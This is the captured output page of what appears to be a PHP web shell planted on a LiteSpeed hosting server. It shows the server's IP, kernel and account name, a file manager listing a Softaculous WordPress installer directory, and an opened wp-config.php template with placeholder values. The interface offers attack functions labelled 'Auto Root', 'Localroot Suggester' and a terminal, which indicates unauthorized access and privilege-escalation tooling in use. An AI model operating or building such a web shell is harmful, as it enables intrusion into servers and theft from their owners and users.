Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
wp /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-10-02 04:26
languages
[ DIR ]
drwxr-xr-x
2025-10-02 04:26
php53
[ DIR ]
drwxr-xr-x
2025-10-02 04:26
php56
[ DIR ]
drwxr-xr-x
2025-10-02 04:26
php71
[ DIR ]
drwxr-xr-x
2025-10-02 04:26
php81
[ DIR ]
drwxr-xr-x
2025-10-02 04:26
php82
[ DIR ]
drwxr-xr-x
2025-10-02 04:26
plugins
[ DIR ]
drwxr-xr-x
2025-10-02 04:26
.htaccess
482
B
-rw-r--r--
2021-12-16 04:02
_htaccess
553
B
-rw-r--r--
2021-12-16 04:02
_index.php
59
B
-rw-r--r--
2021-12-16 04:02
_wp-config.php
3.37
KB
-rw-r--r--
2025-04-16 02:47
add_user.php
461
B
-rw-r--r--
2021-12-16 04:02
backup.php
3.03
KB
-rw-r--r--
2025-10-01 09:09
check_charset.php
2.02
KB
-rw-r--r--
2021-12-16 04:02
clone.php
32.25
KB
-rw-r--r--
2025-10-01 09:09
clone.xml
497
B
-rw-r--r--
2021-12-16 04:02
edit.php
9.9
KB
-rw-r--r--
2025-10-01 09:09
edit.xml
1.98
KB
-rw-r--r--
2025-07-15 09:59
extend.php
101.79
KB
-rw-r--r--
2025-10-01 09:09
fileindex.php
291
B
-rw-r--r--
2021-12-16 04:02
import.php
6.5
KB
-rw-r--r--
2025-10-01 09:09
info.xml
15.96
KB
-rw-r--r--
2025-10-01 05:36
install.js
4.2
KB
-rw-r--r--
2025-06-30 07:57
install.php
32.04
KB
-rw-r--r--
2025-10-01 09:09
install.xml
10.41
KB
-rw-r--r--
2025-07-25 04:58
md5
4.51
KB
-rw-r--r--
2025-10-01 09:09
multisite.sql
37.43
KB
-rw-r--r--
2025-10-01 05:36
notes.txt
6.08
KB
-rw-r--r--
2025-10-01 05:36
plugin_activate.php
596
B
-rw-r--r--
2021-12-16 04:02
plugin_deactivate.php
613
B
-rw-r--r--
2021-12-16 04:02
post_download.json
72
B
-rw-r--r--
2022-05-25 07:00
sign_on.php
3.28
KB
-rw-r--r--
2025-01-28 04:04
soft.htaccess
127
B
-rw-r--r--
2021-12-16 04:02
update_pass.php
602
B
-rw-r--r--
2025-04-16 02:47
upgrade.php
14.69
KB
-rw-r--r--
2025-10-01 09:09
upgrade.xml
1.83
KB
-rw-r--r--
2025-07-15 09:59
wp-cli
6.19
MB
-rwxr-xr-x
2022-07-15 01:49
wp-config.php
3.08
KB
-rw-r--r--
2024-11-13 04:30
wp.sql
30.14
KB
-rw-r--r--
2025-10-01 05:36
wp.zip
27.01
MB
-rw-r--r--
2025-10-01 05:36
Save
Rename
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', '[[softdb]]' ); /** Database username */ define( 'DB_USER', '[[softdbuser]]' ); /** Database password */ define( 'DB_PASSWORD', '[[softdbpass]]' ); /** Database hostname */ define( 'DB_HOST', '[[softdbhost]]' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', '[[utf8]]' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', '[[AUTH_KEY]]' ); define( 'SECURE_AUTH_KEY', '[[SECURE_AUTH_KEY]]' ); define( 'LOGGED_IN_KEY', '[[LOGGED_IN_KEY]]' ); define( 'NONCE_KEY', '[[NONCE_KEY]]' ); define( 'AUTH_SALT', '[[AUTH_SALT]]' ); define( 'SECURE_AUTH_SALT', '[[SECURE_AUTH_SALT]]' ); define( 'LOGGED_IN_SALT', '[[LOGGED_IN_SALT]]' ); define( 'NONCE_SALT', '[[NONCE_SALT]]' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! * * At the installation time, database tables are created with the specified prefix. * Changing this value after WordPress is installed will make your site think * it has not been installed. * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix */ $table_prefix = '[[dbprefix]]'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* Multisite */ define( 'WP_ALLOW_MULTISITE', true ); define( 'MULTISITE', true ); define( 'SUBDOMAIN_INSTALL', false ); define( 'DOMAIN_CURRENT_SITE', '[[domhost]]' ); define( 'PATH_CURRENT_SITE', '[[relativeurl]]/' ); define( 'SITE_ID_CURRENT_SITE', 1 ); define( 'BLOG_ID_CURRENT_SITE', 1 ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';